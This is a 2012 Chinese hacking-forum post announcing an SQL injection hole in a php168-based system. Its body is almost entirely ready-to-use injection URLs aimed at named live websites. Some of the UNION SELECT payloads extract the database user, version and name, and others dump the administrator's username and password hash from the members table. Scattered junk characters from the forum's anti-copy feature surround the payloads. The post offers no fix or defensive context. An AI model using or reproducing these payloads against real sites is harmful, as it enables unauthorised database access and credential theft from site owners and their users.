找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2969|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--' q4 c- l; f: S6 t( a
                                                         : a/ \  @' Y/ m3 G3 U! a1 `
                                       - l2 o: }/ t& J) k
% [& N7 g! Z, I$ S! r0 j( e
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
: a# a0 a8 t- C9 O                                                     
/ {( X" W: k) a                                                                   0 K$ R5 e1 E& K3 i
                                                        
8 ?0 i, |  W: b. t. m" ?' E; ?http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
$ x1 ^! o# ^0 R  A) W5 m
& W; }0 \- `* d0 i6 ]( y  ]% l
; ]; {0 n1 g, H* q4 o( _' @1 D7 g0 X6 F" S
                                                            # M) w. z0 v: w: `2 P8 t) b6 \

: ~- l0 P( l2 r# ^: c  phttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--* h; f$ O- L+ d" m+ Z7 @
4 M7 Q2 K2 G8 N- ]

& \4 n, U3 @4 A. N+ d! }9 p( w9 n+ m3 U4 n6 `2 a$ V0 @8 X& R
                                                                      S9 n3 |3 }2 H" t. d, Y

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表